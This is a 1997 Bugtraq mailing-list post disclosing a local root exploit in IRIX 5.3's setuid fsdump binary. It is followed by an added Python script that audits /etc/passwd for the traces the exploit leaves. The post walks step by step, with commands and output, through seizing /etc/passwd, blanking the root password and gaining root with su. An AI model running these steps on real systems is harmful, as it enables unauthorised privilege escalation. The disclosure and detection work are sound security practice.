Bugtraq mailing list archives
IRIX 5.3 /var/rfindd/fsdump - exploit
From: csh () VIEWGRAPHICS COM (Chris Sheldon)
Date: Tue, 25 Feb 1997 06:33:13 -0800
Ok. Well, yet another IRIX 5.3 root exploit. Of course, the major problem here is that IRIX allows users to give away ownership of files. Without that, this could only be used for changing the permissions on a file so that you could read and modify it.

The system (an Indy):

    IRIX irix 5.3 11091812 IP22 mips

    irix% ls -la /var/rfindd/fsdump
    ---s--x--x 1 root sys 62032 Jul 25 1995 /var/rfindd/fsdump

What tipped me off that it was exploitable was the fact that it was a protected suid binary (---s--x--x). I thought: if someone at SGI is being careful to not let non-root users read the binary, then it *must* be packed with holes... :-)

So, I'm just a normal user today...

    irix% id
    uid=1799(csh) gid=500(users)
    irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /

(count to three, and hit ctrl-c)

    irix% ls -la /etc/passwd
    -rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd

And now I've got root access...

    irix% tail -8 /etc/passwd
    nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
    noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
    nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
    Tue Feb 25 06:23:48 PST 1997
    Number of inodes total 208740; allocated 31259
    Collecting garbage.
    interrupted

All you have to do is edit off the garbage from the passwd file, delete the encrypted root password and reset the perms on the passwd file.

    irix% vi /etc/passwd        # remove the encrypted root password
    irix% chgrp sys /etc/passwd
    irix% chown root /etc/passwd
    irix% su -
    irix#

That's it. (Heck, you don't even have to remove the garbage from the passwd file.)

This can be used to access pretty much any file on the system which is currently group owned... fun, fun, fun until SGI takes the bugs away... ;-) (right)
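The post shows the two traces this bug leaves behind: /etc/passwd ends up owned by the invoking user, and the fsdump log output is appended to it as garbage lines. An added audit script (not from the original post, written here from a detection standpoint) checks an /etc/passwd-style file for exactly those symptoms: non-root ownership or loose permissions, records that are not well-formed seven-field entries, and a uid-0 account with an empty password field. The sample lines below are constructed to mirror the post's tail output; the `root` entry is an assumed one.

```python
"""Audit an /etc/passwd-style file for the symptoms left by the fsdump bug."""
import os
import stat

# Constructed sample mirroring the post: valid records followed by fsdump log lines.
SAMPLE_PASSWD = """root::0:0:Super-User:/:/bin/csh
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted
""".splitlines()


def parse_passwd_lines(lines):
    """Split lines into (entries, bad). An entry is a 7-tuple with integer
    uid/gid; anything else (such as appended log output) is reported as bad."""
    entries, bad = [], []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if not line:
            continue  # blank lines are tolerated
        fields = line.split(":")
        if len(fields) != 7 or not fields[0]:
            bad.append((n, line))
            continue
        try:
            uid, gid = int(fields[2]), int(fields[3])
        except ValueError:
            bad.append((n, line))
            continue
        entries.append((fields[0], fields[1], uid, gid, fields[4], fields[5], fields[6]))
    return entries, bad


def audit_passwd(lines, owner_uid, mode):
    """Return a list of findings for the given content, owner uid and mode bits."""
    findings = []
    if owner_uid != 0:
        findings.append(f"file owner uid {owner_uid} is not root")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"file is group/world writable (mode {oct(mode)})")
    entries, bad = parse_passwd_lines(lines)
    for n, line in bad:
        findings.append(f"line {n}: malformed record: {line!r}")
    for name, passwd, uid, *_ in entries:
        if uid == 0 and passwd == "":
            findings.append(f"uid 0 account {name!r} has an empty password field")
    return findings


def audit_file(path):
    """Audit a real file: ownership and mode come from stat(), content from disk."""
    st = os.stat(path)
    with open(path) as fh:
        return audit_passwd(fh.readlines(), st.st_uid, st.st_mode)


if __name__ == "__main__":
    # Owner uid 1799 and mode 0644 match the ls output in the post.
    for finding in audit_passwd(SAMPLE_PASSWD, owner_uid=1799, mode=0o644):
        print(finding)
```

On a live system, `audit_file("/etc/passwd")` runs the same checks against the real file's stat() data.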